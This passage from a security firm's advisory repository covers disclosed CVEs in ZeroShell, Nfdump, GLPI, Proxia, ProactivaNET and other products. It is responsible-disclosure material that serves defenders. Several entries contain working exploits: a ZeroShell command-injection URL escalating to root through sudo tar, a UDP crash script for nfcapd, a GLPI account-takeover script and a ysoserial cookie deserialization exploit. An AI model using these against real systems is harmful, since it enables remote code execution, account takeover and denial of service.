8 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2019/CVE-2019-12725/CVE-2019-12725.py))
11 |
12 | ## Summary
13 | ZeroShell 3.9.0 (and before) is vulnerable to RCE because some parameters sent to the endpoint are used by a bash script without a properly sanitization.
14 |
15 | ## Details
16 |
17 | An unauthenticated attacker can execute arbitrary commands via command injection with new-line characters:
18 | ```
19 | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509view&User=Admin&x509type='%0Auname -a%0A'
20 | ```
21 |
22 | Additionally the Apache user can execute the "tar" command as root (/etc/sudoers):
23 | ```
24 | (...)
25 | apache ALL= NOPASSWD: /bin/tar
26 | (...)
27 | ```
28 |
29 | This can be abused in order to elevate privileges via the RCE:
30 |
31 | ```
32 | /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A/etc/sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=id%0A'
33 |
34 | uid=0(root) gid=0(root) groups=0(root)
35 | ```
36 | ## Impact
37 |
38 | An unauthenticated attacker can execute commands remotely as root.
39 |
40 | ## Recommendation
41 | Update to last version.
42 |
43 | ## Timeline
44 | * 29/05/2019 - Reported the vulnerability to vendor
45 | * 29/05/2019 - Vendor ACK
46 | * 05/06/2019 - CVE Identifier (CVE-2019-12725) assigned by MITRE
47 | * 04/08/2019 - Security Release with fix (ZeroShell 3.9.3)
48 |
49 | #
50 |
51 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
52 |
--------------------------------------------------------------------------------
/2019/CVE-2019-14459/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-14459: Denial of Service in Nfdump
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ Peter Haag
6 | __Vendor URL:__ https://github.com/phaag/nfdump
7 | __Versions affected:__ Nfdump <= 1.6.17
8 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2019/CVE-2019-14459/))
11 |
12 | ## Summary
13 | nfdump 1.6.17 and earlier is affected by an integer overflow in the function Process_ipfix_template_withdraw in ipfix.c that can be abused in order to crash the process remotely (denial of service).
14 |
15 | ## Details
16 |
17 | An integer overflow at function that can be abused in order to crash the process remotely (denial of service). The function `Process_ipfix_template_withdraw` uses size_left as uint32_t which is an unsigned integer, so if we have a size_left with value 1, when the substraction at line 1429 is done (`size_left -= 4;`), it will overflow and become 4294967293 (0xfffffffd). As this is a value higher than "4", the size check made at line 1443 (`if ( size_left < 4 ){(...) size_left = 0; (...)}`) will be bypassed. At this point we have a huge loop (`while ( size_left )`) where the pointer DataPtr will be increased by 4 in each iteration until it reaches an invalid memory address and segfaults.
18 |
19 | ```
20 | import socket
21 | import sys
22 |
23 | packet = [
24 | 0x00, 0x0a, 0xc8, 0xc9, 0x00, 0x00, 0x0a, 0x20,
25 | 0x00, 0x5d, 0x53, 0x64, 0x02, 0x00, 0x00, 0x03,
26 | 0x00, 0x02, 0x00, 0x05, 0x11, 0x00
27 | ]
28 |
29 | exploit = ""
30 | for x in packet:
31 | exploit += chr(x)
32 |
33 | print "[*] Nfcapd DoS - Integer Overflow at Process_ipfix_template_withdraw()"
34 | print "[*] Rocket to: %s:%s" % (sys.argv[1], sys.argv[2])
35 |
36 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
37 | sock.sendto(exploit, (sys.argv[1], int(sys.argv[2])))
38 |
39 | ```
40 |
41 | ## Impact
42 | This vulnerability can be abused to crash the service and generate a Denial of Service.
43 |
44 | ## Recommendation
45 | Update to last version.
46 |
47 | ## Timeline
48 | * 07/07/2019 - Reported vulnerability to vendor
49 | * 27/07/2019 - Fixed in Github
50 | * 14/08/2019 - Security Release with fix (Nfdump 1.6.18)
51 |
52 | #
53 |
54 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
55 |
--------------------------------------------------------------------------------
/2019/CVE-2019-14666/CVE-2019-14666.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # CVE-2019-14666 - Account takeover
4 | #
5 | # Software: GLPI <= 9.4.3
6 | # Author: Pablo Martinez (@xassiz) from BlackArrow
7 | # Details: https://github.com/blackarrowsec/advisories/tree/master/2019/CVE-2019-14666
8 | # Web: [www.blackarrow.net] - [www.tarlogic.com]
9 | #
10 |
11 |
12 | import re
13 | import sys
14 | import json
15 | import argparse
16 | import requests
17 |
18 | class GlpiBrowser:
19 | def __init__(self, url, user, password):
20 | self.url = url
21 | self.user = user
22 | self.password = password
23 |
24 | self.session = requests.Session()
25 | self.session.verify = False
26 | requests.packages.urllib3.disable_warnings()
27 |
28 | def extract_csrf(self, html):
29 | return re.findall('name="_glpi_csrf_token" value="([a-f0-9]{32})"', html)[0]
30 |
31 | def get_login_data(self):
32 | r = self.session.get('{0}'.format(self.url), allow_redirects=True)
33 |
34 | csrf_token = self.extract_csrf(r.text)
35 | name_field = re.findall('name="(.*)" id="login_name"', r.text)[0]
36 | pass_field = re.findall('name="(.*)" id="login_password"', r.text)[0]
37 |
38 | return name_field, pass_field, csrf_token
39 |
40 | def login(self):
41 | try:
42 | name_field, pass_field, csrf_token = self.get_login_data()
43 | except Exception as e:
44 | print "[-] Login error: could not retrieve form data"
45 | sys.exit(1)
46 |
47 | data = {
48 | name_field: self.user,
49 | pass_field: self.password,
50 | "auth": "local",
51 | "submit": "Post",
52 | "_glpi_csrf_token": csrf_token
53 | }
54 |
55 | r = self.session.post('{}/front/login.php'.format(self.url), data=data, allow_redirects=False)
56 |
57 | return r.status_code == 302
58 |
59 | def get_data(self, itemtype, field, term=None):
60 | params = {
61 | "itemtype": itemtype,
62 | "field": field,
63 | "term": term if term else ""
64 | }
65 |
66 | r = self.session.get('{}/ajax/autocompletion.php'.format(self.url), params=params)
67 |
68 | if r.status_code == 200:
69 | try:
70 | data = json.loads(r.text)
71 | except:
72 | return None
73 | return data
74 | return None
75 |
76 | def get_forget_token(self):
77 | return self.get_data('User', 'password_forget_token')
78 |
79 | def get_emails(self):
80 | return self.get_data('UserEmail', 'email')
81 |
82 | def lost_password_request(self, email):
83 | r = self.session.get('{0}/front/lostpassword.php'.format(self.url))
84 | try:
85 | csrf_token = self.extract_csrf(r.text)
86 | except Exception as e:
87 | print "[-] Lost password error: could not retrieve form data"
88 | sys.exit(1)
89 |
90 | data = {
91 | "email": email,
92 | "update": "Save",
93 | "_glpi_csrf_token": csrf_token
94 | }
95 |
96 | r = self.session.post('{}/front/lostpassword.php'.format(self.url), data=data)
97 | return 'An email has been sent' in r.text
98 |
99 | def change_password(self, email, password, token):
100 | r = self.session.get('{0}/front/lostpassword.php'.format(self.url), params={'password_forget_token': token})
101 | try:
102 | csrf_token = self.extract_csrf(r.text)
103 | except Exception as e:
104 | print "[-] Change password error: could not retrieve form data"
105 | sys.exit(1)
106 |
107 | data = {
108 | "email": email,
109 | "password": password,
110 | "password2": password,
111 | "password_forget_token": token,
112 | "update": "Save",
113 | "_glpi_csrf_token": csrf_token
114 | }
115 |
116 | r = self.session.post('{}/front/lostpassword.php'.format(self.url), data=data)
117 | return 'Reset password successful' in r.text
118 |
119 | def pwn(self, email, password):
120 |
121 | if not self.login():
122 | print "[-] Login error"
123 | return
124 |
125 | tokens = self.get_forget_token()
126 | if tokens is None:
127 | tokens = []
128 |
129 | if email:
130 | if not self.lost_password_request(email):
131 | print "[-] Lost password error: could not request"
132 | return
133 |
134 | new_tokens = self.get_forget_token()
135 |
136 | res = list(set(new_tokens) - set(tokens))
137 | if res:
138 | for token in res:
139 | if self.change_password(email, password, token):
140 | print "[+] Password changed! ;)"
141 | return
142 |
143 |
144 | if __name__ == '__main__':
145 |
146 | parser = argparse.ArgumentParser()
147 | parser.add_argument("--url", help="Target URL", required=True)
148 | parser.add_argument("--user", help="Username", required=True)
149 | parser.add_argument("--password", help="Password", required=True)
150 | parser.add_argument("--email", help="Target email")
151 | parser.add_argument("--newpass", help="New password")
152 |
153 | args = parser.parse_args()
154 |
155 | g = GlpiBrowser(args.url, user=args.user, password=args.password)
156 |
157 | g.pwn(args.email, args.newpass)
158 |
--------------------------------------------------------------------------------
/2019/CVE-2019-14666/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-14666: Account takeover in GLPI
2 | []() []() []()
3 |
4 | __Vendor:__ GLPI Project
5 | __Vendor URL:__ https://glpi-project.org/es/
6 | __Versions affected:__ GLPI <= 9.4.3
7 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2019/CVE-2019-14666/CVE-2019-14666.py))
10 |
11 |
12 | ## Summary
13 | GLPI through 9.4.3 is prone to account takeover by abusing the ajax/autocompletion.php autocompletion feature.
14 |
15 | ## Details
16 |
17 | The lack of correct validation leads to recovery of the token generated via the password reset functionality, and thus an authenticated attacker can set an arbitrary password for any user. This vulnerability can be exploited to take control of admin account. This vulnerability could be also abused to obtain other sensitive fields like API keys or password hashes.
18 |
19 | ## Impact
20 | This vulnerability can be abused to take control of administrative account.
21 |
22 | ## Recommendation
23 | Update to last version.
24 |
25 | ## Timeline
26 | * 19/07/2019 - Reported vulnerability to vendor
27 | * 24/09/2019 - Security Release with fix (GLPI 9.4.4)
28 |
29 |
30 | #
31 |
32 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2019/CVE-2019-18956/CVE-2019-18956.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #
3 | # CVE-2019-18956 - Remote Code Execution (Java Deserialization) in Proxia Suite, Proxia PHR & SparkSpace
4 | #
5 | # Software:
6 | # Proxia Suite 10.1; < 10.1.5
7 | # Proxia Suite 10.0; < 10.0.32
8 | # Proxia Suite 9; < 9.12.16, 9.11.19, 9.10.26, 9.9.8, 9.8.43 & 9.7.10;
9 | # SparkSpace 1.2; < 1.2.4
10 | # SparkSpace 1.1; < 1.1.2
11 | # SparkSpace 1.0; < 1.0.30
12 | # Proxia PHR 1.1; < 1.1.2
13 | # Proxia PHR 1.0; < 1.0.30
14 | #
15 | # Author: Pablo Martinez (@xassiz) from BlackArrow
16 | # Details: https://github.com/blackarrowsec/advisories/tree/master/2019/CVE-2019-18956
17 | # Web: [www.blackarrow.net] - [www.tarlogic.com]
18 | #
19 |
20 | die_help () {
21 | echo "Usage: ${0} url ysoserial_payload cmd"
22 | exit 1
23 | }
24 |
25 | [ "${#}" -eq "3" ] || die_help
26 |
27 |
28 | echo "[+] Target: ${1}"
29 | echo "[+] Payload: ${2}"
30 | echo "[+] Cmd: ${3}"
31 |
32 | PAYLOAD="$(java -jar "ysoserial.jar" "${2}" "${3}" | tr -d '\0')"
33 |
34 | if [ "${?}" -eq "0" ]
35 | then
36 | curl -I -k "${1}" --cookie "proxia-error=$(gzip <<< "${PAYLOAD}" | base64 -w0 | tr '/' '-' | tr '+' '_' | tr '=' '.')"
37 | fi
38 |
--------------------------------------------------------------------------------
/2019/CVE-2019-18956/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-18956: Remote Code Execution (Java Deserialization) in Proxia Suite, Proxia PHR & SparkSpace
2 | []() []() []()
3 |
4 | __Vendor:__ Divisa iT
5 | __Vendor URL:__ https://www.divisait.com
6 | __Versions affected:__ Multiple versions and products (check the details section to view the full list)
7 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz)), Eloy Perez ([@Zer1t0](https://twitter.com/zer1t0))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2019/CVE-2019-18956/CVE-2019-18956.sh))
10 |
11 |
12 | ## Summary
13 | The dv2eemvc library deserializes a cookie in a unsafe way leading to the remote execution of arbitrary code. Multiple products are affected by the usage of this lib.
14 |
15 | ## Details
16 | The method `prepareError` from the `com.divisait.dv2ee.controller.MVCControllerServlet` class is called every time a HTTP request is processed.
17 |
18 | ```java
19 | private void prepareError(Mapping mapping, MultipartRequest request, HttpServletResponse response)
20 | {
21 | String errorAction = HttpUtils.getCookie(request, "proxia-error");
22 | HttpUtils.clearSessionCookie(request, response, "proxia-error");
23 | if (errorAction == null) {
24 | return;
25 | }
26 | try
27 | {
28 | Base64 b64 = new Base64();
29 | byte[] message = b64.decode(errorAction);
30 | ObjectInputStream serin = new ObjectInputStream(new GZIPInputStream(new ByteArrayInputStream(message)));
31 |
32 | HashMap toReturn = (HashMap)serin.readObject();
33 | serin.close();
34 | if (!toReturn.isEmpty())
35 | {
36 | Iterator key = toReturn.keySet().iterator();
37 | while (key.hasNext())
38 | {
39 | String entry = (String)key.next();
40 | Object data = toReturn.get(entry);
41 | request.setAttribute(entry, data);
42 | }
43 | }
44 | }
45 | catch (Exception e) {}
46 | ```
47 |
48 | This method deserializes insecurely the contents of the `proxia-error` cookie, so an attacker can manipulate it in order to achieve arbitrary code execution.
49 |
50 | The vendor provided us with the complete list of affected versions:
51 |
52 | __Lib versions:__
53 | * dv2eemvc-17; releases between dv2eemvc-17-62 and dv2eemvc-17-147
54 | * dv2eemvc-18.6; releases < 18.6.42
55 | * dv2eemvc-19.0; releases < 19.0.13
56 | * dv2eemvc-19.1; releases < 19.1.19
57 | * dv2eemvc-19.2; releases < 19.2.41
58 | * dv2eemvc-19.3; releases < 19.3.37
59 | * dv2eemvc-19.4; releases < 19.4.13
60 | * dv2eemvc-20.0; releases < 20.0.13
61 |
62 | __Product versions:__
63 | * Proxia Suite 10.1; < 10.1.5
64 | * Proxia Suite 10.0; < 10.0.32
65 | * Proxia Suite 9; < 9.12.16, 9.11.19, 9.10.26, 9.9.8, 9.8.43 & 9.7.10;
66 | * SparkSpace 1.2; < 1.2.4
67 | * SparkSpace 1.1; < 1.1.2
68 | * SparkSpace 1.0; < 1.0.30
69 | * Proxia PHR 1.1; < 1.1.2
70 | * Proxia PHR 1.0; < 1.0.30
71 |
72 | ## Impact
73 | This vulnerability can be used to execute code in the server.
74 |
75 | ## Recommendation
76 | Update to the latest version.
77 |
78 | ## Timeline
79 | * 29/10/2019 - Vulnerability reported to vendor
80 | * 30/10/2019 - (9:31) ACK from vendor
81 | * 30/10/2019 - (13:37) Vendor fixes the issue and releases new versions of the affected products (_the mail actually arrived at 13:36_)
82 |
83 |
84 | #
85 |
86 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
87 |
--------------------------------------------------------------------------------
/2020/CVE-2020-12606/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-12606: SQL injection in SGLAC
2 | []() []() []()
3 |
4 | __Vendor:__ DBSOFT
5 | __Vendor URL:__ http://www.dbsoft.es/es-es/productos/sglac.aspx
6 | __Versions affected:__ SGLAC <20.05.001
7 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | SGLAC web frontend (<20.05.001) is prone to an unauthenticated SQL injection.
15 |
16 | ## Details
17 |
18 | The ProcedimientoGenerico method in the SVCManejador.svc webservice of the SGLAC web frontend allows an attacker to run arbitrary SQL commands on the SQL Server.
19 |
20 | ## Impact
21 |
22 | Command execution can be easily achieved by using the xp_cmdshell stored procedure.
23 |
24 | ## Recommendation
25 | Update to a fixed version (=>20.05.001).
26 |
27 | ## Timeline
28 | * 28/04/2020 - Vendor contact
29 | * 27/05/2020 - Release of fixed version
30 |
31 |
32 | #
33 |
34 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
35 |
--------------------------------------------------------------------------------
/2020/CVE-2020-28657/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-28657: Multiple SQL injections in bPanel2
2 | []() []() []()
3 |
4 | __Vendor:__ bittacora
5 | __Vendor URL:__ https://bittacora.com/
6 | __Versions affected:__ bPanel2
7 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | bPanel2 is prone to multiple unauthenticated SQL injections.
15 |
16 | ## Details
17 |
18 | The administrative ajax endpoints (aka ajax/aj_*.php) are affected by SQL injections, which are accessible without authentication.
19 |
20 | ## Impact
21 |
22 | This could lead to platform compromise, by dumping and cracking administrative password hashes.
23 |
24 | ## Recommendation
25 | Update to a fixed version (>2).
26 |
27 | ## Timeline
28 | * 12/11/2020 - Reported vulnerability to vendor
29 | * 18/11/2020 - Vendor acknowledges the issue, but says that it's already fixed in newer versions
30 | * 02/03/2021 - Public disclosure
31 |
32 |
33 | #
34 |
35 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
36 |
--------------------------------------------------------------------------------
/2020/CVE-2020-35577/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-35577: IDOR in Endalia Selection Portal
2 | []() []() []()
3 |
4 | __Vendor:__ Endalia
5 | __Vendor URL:__ https://www.endalia.com/software/seleccion/
6 | __Versions affected:__ Endalia Selection Portal < 4.205.0
7 | __Discovered by:__ Antón Ortigueira ([@antuache](https://twitter.com/antuache))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | Endalia Selection Portal (< 4.205.0) is prone to an authenticated Insecure Direct Object Reference (IDOR).
15 |
16 | ## Details
17 |
18 | An IDOR vulnerability allows any authenticated user to download private files uploaded by other users, by changing the value of the file identifier in a __CommonDownload__ request.
19 |
20 | ## Impact
21 |
22 | Sensitive user data such as bank details or identification documents are stored on this platform. An attacker could download them by registering a user account.
23 |
24 | ## Recommendation
25 |
26 | Update to a fixed version (=> 4.205.0).
27 |
28 | ## Timeline
29 | * 12/11/2020 - Vendor contact
30 | * 24/11/2020 - Release of fixed version
31 | * 18/02/2021 - Public disclosure
32 |
33 |
34 | #
35 |
36 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
37 |
--------------------------------------------------------------------------------
/2021/CVE-2021-33207/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2021-33207: Remote Code Execution (Java Deserialization)
2 | []() []() []()
3 |
4 | __Vendor:__ Software AG
5 | __Vendor URL:__ https://www.softwareag.com/corporate/products/az/mashzone_nextgen/default
6 | __Versions affected:__ MashZone NextGen 10.7 GA | Build 1607 (Vendor did not provide data about other affected versions)
7 | __Discovered by:__ Marcos Díaz
8 | __Public fix:__ No
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | MashZone NextGen 10.7 GA | Build 1607 and likely other/older versions, are affected by an insecure Java Object deserialization.
15 |
16 | ## Details
17 |
18 | The method `errorResponse` from the class `com.idsscheer.ppmmashup.io.util.ZHttpRequestHelper` performs an insecure Java deserialization from the body of a special crafted HTTP answer.
19 |
20 | ## Impact
21 |
22 | Command execution can be achieved forcing the application to make a HTTP request to a server controlled by an attacker.
23 |
24 | ## Recommendation
25 | Make sure you have changed the default administrative credentials. At this point we do not have information about a fix from Software AG.
26 |
27 | ## Timeline
28 | * 19/05/2021 - Reported vulnerability to vendor
29 | * 31/08/2021 - A representative from Software AG asks for details
30 | * 30/03/2022 - Public Disclosure
31 |
32 | ------
33 |
34 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
35 |
--------------------------------------------------------------------------------
/2021/CVE-2021-33208/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2021-33208: XML External Entity (XXE)
2 | []() []() []()
3 |
4 | __Vendor:__ Software AG
5 | __Vendor URL:__ https://www.softwareag.com/corporate/products/az/mashzone_nextgen/default
6 | __Versions affected:__ MashZone NextGen 10.7 GA | Build 1607 (Vendor did not provide data about other affected versions)
7 | __Discovered by:__ Marcos Díaz
8 | __Public fix:__ No
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | MashZone NextGen 10.7 GA | Build 1607 and likely other/older versions, are affected by a XXE vulnerability.
15 |
16 | ## Details
17 |
18 | MashZone NextGen uses a XML file to setup a feature called "Ehcache". It is possible to include XML external entities in this file that are evaluated by the application's XML parser.
19 |
20 | ## Impact
21 |
22 | Leak of internal files / DoS / SSRF.
23 |
24 | ## Recommendation
25 |
26 | Make sure you have changed the default administrative credentials. At this point we do not have information about a fix from Software AG.
27 |
28 | ## Timeline
29 |
30 | * 19/05/2021 - Reported vulnerability to vendor
31 | * 31/08/2021 - A representative from Software AG asks for details
32 | * 30/03/2022 - Public Disclosure
33 |
34 | ------
35 |
36 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
37 |
--------------------------------------------------------------------------------
/2021/CVE-2021-33523/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2021-33523: Remote Code Execution (new JDBC driver)
2 | []() []() []()
3 |
4 | __Vendor:__ Software AG
5 | __Vendor URL:__ https://www.softwareag.com/corporate/products/az/mashzone_nextgen/default
6 | __Versions affected:__ MashZone NextGen 10.7 GA | Build 1607 (Vendor did not provide data about other affected versions)
7 | __Discovered by:__ Marcos Díaz
8 | __Public fix:__ No
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | MashZone NextGen 10.7 GA | Build 1607 and likely other/older versions, are affected by a remote code execution vulnerability.
15 |
16 | ## Details
17 |
18 | MashZone NextGen allows an administrator to install a new **JDBC driver**. This feature can be abused to execute arbitrary commands on the underlying host or deploy a webshell.
19 |
20 | ## Impact
21 |
22 | This vulnerability can be used to execute code in the server.
23 |
24 | ## Recommendation
25 |
26 | Make sure you have changed the default administrative credentials. At this point we do not have information about a fix from Software AG.
27 |
28 | ## Timeline
29 | * 19/05/2021 - Reported vulnerability to vendor
30 | * 31/08/2021 - A representative from Software AG asks for details
31 | * 30/03/2022 - Public Disclosure
32 |
33 | ------
34 |
35 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
36 |
--------------------------------------------------------------------------------
/2021/CVE-2021-33581/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2021-33581: Server Side Request Forgery (SSRF)
2 | []() []() []()
3 |
4 | __Vendor:__ Software AG
5 | __Vendor URL:__ https://www.softwareag.com/corporate/products/az/mashzone_nextgen/default
6 | __Versions affected:__ MashZone NextGen 10.7 GA | Build 1607 (Vendor did not provide data about other affected versions)
7 | __Discovered by:__ Marcos Díaz
8 | __Public fix:__ No
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | MashZone NextGen 10.7 GA | Build 1607 and likely other/older versions, are affected by a SSRF.
15 |
16 | ## Details
17 |
18 | The HTTP endpoint `/mashzone/mzservices/admin/getppmversion` parameter `url` performs HTTP connections to arbitrary URLs.
19 |
20 | ## Impact
21 |
22 | This vulnerability can be used in combination to **CVE-2021-33207** to achieve RCE.
23 |
24 | ## Recommendation
25 | Make sure you have changed the default administrative credentials. At this point we do not have information about a fix from Software AG.
26 |
27 | ## Timeline
28 | * 19/05/2021 - Reported vulnerability to vendor
29 | * 31/08/2021 - A representative from Software AG asks for details
30 | * 30/03/2022 - Public Disclosure
31 |
32 | ------
33 |
34 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
35 |
--------------------------------------------------------------------------------
/2022/CVE-2022-30977/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2022-30977: Remote Code Execution in ProactivaNET <= 10.14
2 | []() []() []()
3 |
4 | __Vendor:__ ProactivaNET
5 | __Vendor URL:__ https://www.proactivanet.com/discovery-gestion-de-activos
6 | __Versions affected:__ ProactivaNET <= 10.14
7 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | ProactivaNET through 10.14 allows the unrestricted uploading of a Web.config file, resulting in OS command execution.
15 |
16 | ## Details
17 |
18 | The file upload functionality in the `/proactivanet/paw3/pages/insertImg/default.paw` endpoint does not properly validate the file extensions (other uploaders may be affected). It is possible to upload any file using capital letters for its extension, bypassing the blacklist.
19 |
20 | Even though script execution is disabled in the upload directory, a remote authenticated user can upload a Web.config file in order to execute arbitrary commands on the server.
21 |
22 | ## Impact
23 |
24 | Command execution can be achieved by uploading a Web.config file.
25 |
26 | ## Recommendation
27 |
28 | Update to the latest available version of the software.
29 |
30 | ## Timeline
31 | * 20/04/2022 - Reported vulnerability to vendor
32 | * 05/05/2022 - Meeting with the ProactivaNET team to explain the details
33 | * 16/08/2022 - Public Disclosure
34 |
35 | ------
36 |
37 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
38 |
39 |
--------------------------------------------------------------------------------
/2022/CVE-2022-30978/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2022-30978: SQL injection in ProactivaNET <= 10.14
2 | []() []() []()
3 |
4 | __Vendor:__ ProactivaNET
5 | __Vendor URL:__ https://www.proactivanet.com/discovery-gestion-de-activos
6 | __Versions affected:__ ProactivaNET <= 10.14
7 | __Discovered by:__ Guillermo Torre
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | ProactivaNET through 10.14 is prone to unauthenticated SQL Injection.
15 |
16 | ## Details
17 |
18 | The `pawLoginFormUserName` parameter in the ProactivaNET login request to the `/proactivanet/portal/ui/loginform/default.paw` endpoint is prone to a blind SQL injection.
19 |
20 | ## Impact
21 |
22 | This could lead to platform compromise, by bypassing authentication.
23 |
24 | ## Recommendation
25 | Update to the latest available version of the software.
26 |
27 | ## Timeline
28 | * 20/04/2022 - Reported vulnerability to vendor
29 | * 05/05/2022 - Meeting with the ProactivaNET team to explain the details
30 | * 16/08/2022 - Public Disclosure
31 |
32 | ------
33 |
34 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
35 |
36 |
37 |
--------------------------------------------------------------------------------
/2022/CVE-2022-43216/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2022-43216: AbrhilSoft Employee's Portal SQL Injection
2 | []() []() []()
3 |
4 | __Vendor:__ ABRL SISTEMAS & PROYECTOS
5 | __Vendor URL:__ https://abrhil.com/
6 | __Versions affected:__ AbrhilSoft Employee's Portal "Lista de asistencia" <= ABR-MX-5.6.2
7 | __Discovered by:__ Antón Ortigueira ([@antuache](https://twitter.com/antuache))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | AbrhilSoft Employee's Portal before v5.6.2 was discovered to contain a SQL injection vulnerability in the login page.
15 |
16 | ## Details
17 |
18 | The `clave` parameter included in the login request to the endpoint `/login/acceso` is prone to a blind SQL injection.
19 |
20 | ## Impact
21 |
22 | This could potentially result in the compromise of the platform due to the bypass of authentication mechanisms.
23 |
24 | ## Recommendation
25 |
26 | Update to the latest available version of the software.
27 |
28 | ## Timeline
29 | * 11/10/2022 - Reported vulnerability to vendor
30 | * 04/04/2024 - Public Disclosure
31 |
32 | ------
33 |
34 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
35 |
36 |
--------------------------------------------------------------------------------
/2024/CVE-2024-21172/Readme.md:
--------------------------------------------------------------------------------
1 | # CVE-2024-21172: CREDENTIAL EXFILTRATION VIA SMB
2 | []() []() []()
3 |
4 | __Vendor:__ Oracle Hospitality OPERA 5
5 | __Vendor URL:__ https://www.oracle.com/es/hospitality/products/opera-property-services/
6 | __Versions affected:__ 5.6.19.19, 5.6.25.8, 5.6.26.4
7 | __Discovered by:__ Marcos Díaz
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | Oracle Hospitality OPERA 5 versions 5.6.19.19, 5.6.25.8, 5.6.26.4, are affected by a coerce auth NTLM vulnerability via a HTTP request.
15 |
16 | ## Details
17 |
18 | The servlet `com.micros.opera.servlet.FileInfo` (**operainternalservlets.war**) can be used to coerce a NTLM authentication against an arbitrary SMB server using UNC paths.
19 |
20 | ## Impact
21 |
22 | Successful attacks of this vulnerability can result in takeover of Oracle Hospitality OPERA 5.
23 |
24 | ## Recommendation
25 |
26 | Update Oracle Hospitality OPERA 5.
27 |
28 | ## Timeline
29 |
30 | * 04/02/2024 - Vulnerability report to vendor
31 | * 15/10/2024 - Public Disclosure
32 |
33 | ------
34 |
35 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
36 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 BlackArrow
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
